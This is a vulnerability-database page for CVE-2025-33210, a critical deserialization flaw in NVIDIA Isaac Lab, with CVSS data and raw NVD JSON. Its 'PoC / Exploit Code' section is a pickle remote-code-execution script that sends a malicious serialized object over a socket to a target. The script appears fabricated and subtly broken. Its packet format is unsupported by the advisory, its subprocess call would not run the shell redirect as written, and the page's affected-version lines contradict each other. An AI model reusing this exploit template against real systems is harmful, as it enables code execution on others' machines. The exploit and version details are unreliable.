Security Vulnerability Report
中文
CVE-2025-33210 CVSS 9.0 CRITICAL

CVE-2025-33210

Published: 2025-12-16 18:16:11
Last Modified: 2026-02-02 16:16:47

Description

NVIDIA Isaac Lab contains a deserialization vulnerability. A successful exploit of this vulnerability might lead to code execution.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:isaac_lab:*:*:*:*:*:*:*:* - VULNERABLE
NVIDIA Isaac Lab < 2.0.0
NVIDIA Isaac Lab < 修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-33210 PoC - Malicious Serialized Object for NVIDIA Isaac Lab # This PoC demonstrates the deserialization vulnerability in Isaac Lab # WARNING: For educational and authorized security testing only import pickle import subprocess import base64 class MaliciousPayload: def __reduce__(self): # Execute arbitrary command when object is deserialized cmd = "whoami > /tmp/pwned.txt" return (subprocess.check_output, (cmd,)) def generate_malicious_serialized_data(): """Generate malicious serialized data for Isaac Lab""" # Create malicious object payload = MaliciousPayload() # Serialize the payload serialized = pickle.dumps(payload) # Encode as base64 for transmission encoded_payload = base64.b64encode(serialized).decode('utf-8') return encoded_payload def exploit_isaac_lab(target_ip, target_port=5555): """Exploit CVE-2025-33210 in NVIDIA Isaac Lab""" import socket import struct # Generate malicious payload payload = generate_malicious_serialized_data() # Construct exploit packet for Isaac Lab # Header: Magic bytes + Length + Type (Serialized Data) packet = b'ISAAC' # Magic header packet += struct.pack('>I', len(payload)) # Payload length packet += b'\x02' # Packet type: Serialized data packet += payload.encode('utf-8') try: # Send exploit to target sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) sock.send(packet) sock.close() print(f"[+] Exploit sent to {target_ip}:{target_port}") print(f"[+] Payload: {payload[:50]}...") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("CVE-2025-33210 PoC - NVIDIA Isaac Lab Deserialization RCE") print("Usage: python cve-2025-33210.py <target_ip> [port]") # generate_malicious_serialized_data()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33210", "sourceIdentifier": "[email protected]", "published": "2025-12-16T18:16:11.163", "lastModified": "2026-02-02T16:16:46.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Isaac Lab contains a deserialization vulnerability. A successful exploit of this vulnerability might lead to code execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:isaac_lab:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.0", "matchCriteriaId": "76BC2425-8870-4601-9B11-E7B73794DEC3"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33210", "source": "[email protected]", "tags": ["US Government Resource", "VDB Entry"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5733", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33210", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}